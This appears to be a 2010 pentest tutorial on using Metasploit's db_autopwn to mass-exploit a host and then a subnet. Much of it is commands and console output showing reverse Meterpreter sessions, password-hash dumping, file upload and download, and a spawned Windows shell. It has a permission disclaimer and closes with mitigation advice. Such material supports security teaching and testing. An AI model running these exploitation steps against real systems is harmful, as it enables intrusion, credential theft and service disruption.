These techniques can be used to scan networks by identifying real exploitable vulnerabilites on-mass. Patch-management and proper configuration are usually the cures for most of these vulnerabilities, but having knowledge of where the exploitable vulnerabilites are in a network is the first step to help focus your efforts in the most needy areas.
Also, knowing the power that an attacker can wield with such tools can help raise the priority of IT Security in risk assessment, especially when reporting to managment, so that the correct resources can be applied to reduce risks.
Please be good and do not abuse these techniques to attack systems where you don't have express permission. These techniques can easily cause denial of service, and should only be used for pentesting and educational purposes.
We will be using Backtrack 4 R1 in these examples, as Metasploit and Mysql are already installed and preconfigured.
We are going to be logging our information to a database, so let's start Mysql first:
netstat -antp |grep 3306
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 5852/mysqld
That's Mysql running ok, now let's start Metasploit:
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9959 updated 8 days ago (2010.08.05)
Warning: This copy of the Metasploit Framework was last updated 8 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
First we will select a database driver, in this case we are using Mysql
Basic db_autopwn pwnage
In the first example we will create a new database called mytest1 using our mysql credentials, connect to it, and scan a single machine using nmap. Then we will run all the vulnerabilites that match the open ports that are found:
db_autopwn -p -t -e -r
The db_autopwn options in this example will match exploits to open ports (-p) show the exploits to be run (-t) run the exploits (-e) and connect back using a reverse meterpreter payload (-e).
This may take several minutes to run, based on the number and types of open ports. HTTP ports can take a long time, due to the large number of available exploits included in Metasploit for the well known HTTP ports. Let the exploitation complete (it may take 10mins+ depending on your connectivity to the victim system)
If any exploits are successful, a list of active sessions to the victim machine will be shown. We have a reverse meterpreter session and we can interact with it as follows:
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter TEST-DESKTOP\Ben @ TEST-DESKTOP 192.168.1.64:4444 -> 192.168.1.65:1386
sessions -i 1
[*] Starting interaction with 1...
Once we connect to the session further attacks and analysis can proceed as follows:
1) Obtaining the password hashes:
Loading extension priv...success.
2) Uploading and downloading files:
upload /var/www/plink.exe c:\\
[*] uploading : /var/www/plink.exe -> c:\
[*] uploaded : /var/www/plink.exe -> c:\\plink.exe
download c:\\windows\\system32\\drivers\\etc\\hosts /root/hosts
[*] downloading: c:\windows\system32\drivers\etc\hosts -> /root/hosts
[*] downloaded : c:\windows\system32\drivers\etc\hosts -> /root/hosts
3) Gaining a shell:
Process 2640 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
IP address range exploitation
Attacking multiple machines is where the power of db_autopwn really comes into effect.
Lets scan, and attempt to exploit, a whole subnet in a new database
Now let's look at the systems we have data on:
address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace
------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- ---------
192.168.1.254 Tue Aug 17 12:51:56 UTC 2010 00:0E:50:EC:B2:A6 speedtouch.lan alive Tue Aug 17 12:51:56 UTC 2010 5 0 default
192.168.1.65 Tue Aug 17 13:22:14 UTC 2010 00:22:3F:E9:89:FF test_system.lan alive Tue Aug 17 13:22:14 UTC 2010 4 0 default
Again, an exploitation of the scanned machines could be run as follows:
db_autopwn -p -t -e -r
However, depending on the number of machines found, running this exploitation may take considerable time.
Additionally, in a live pentest, exploiting many systems at once can cause denial of service headaches on multiple systems. This can be mitigated by focusing the exploitation on particular ports, or particular ranges of machines, and working through the network gradually, logging vulnerabilities in our database as we go.
The exploitation can be focused by; IP address range:
db_autopwn -p -t -e -r -I 192.168.1.10
..or by port:
db_autopwn -p -t -e -r -PI 445
.. or both:
db_autopwn -p -t -e -r -PI 445 -I 192.168.1.10
For large numbers of vulnerable machines, this makes the exploitation and analysis more manageable, especially on production networks where live services may be affected and need to be restarted.
What have we found?
We exploited multiple vulnerabilities in several systems, gained access, and "did stuff", but which vulnerabilities did we exploit on these systems?
You can interrogate the list of successful exploitations by running the following command in Metasploit:
Alternatively, we can go and have a poke around in the mysql database directly, with the following sequence of commands:
mysql -u root -ptoor
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.0.67-0ubuntu6 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
| Database |
| information_schema |
| mysql |
| mysubnet1 |
7 rows in set (0.36 sec)
mysql> use mysubnet1;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
mysql> show tables;
| Tables_in_mysubnet1 |
| clients |
| events |
| hosts |
| loots |
| notes |
| refs |
| reports |
| schema_migrations |
| services |
| tasks |
| users |
| vulns |
| vulns_refs |
| wmap_requests |
| wmap_targets |
| workspaces |
16 rows in set (0.00 sec)
mysql> select * from vulns;
We have completed our basic pentest on our subnet, and identified some vulnerable hosts. We know exactly which ones, and what needs to be fixed.
Take a bow for a round of applause, time for a teabreak ...and that was a basic guide on db_autopwn
These threats are best mitigated using an IT Security program which includes:
- Multiple layers (defense in depth)
- Secure application development/deployment
- Applying recommended safe configurations
- Patch management and software upgrades
- Vulnerability scanning and remediation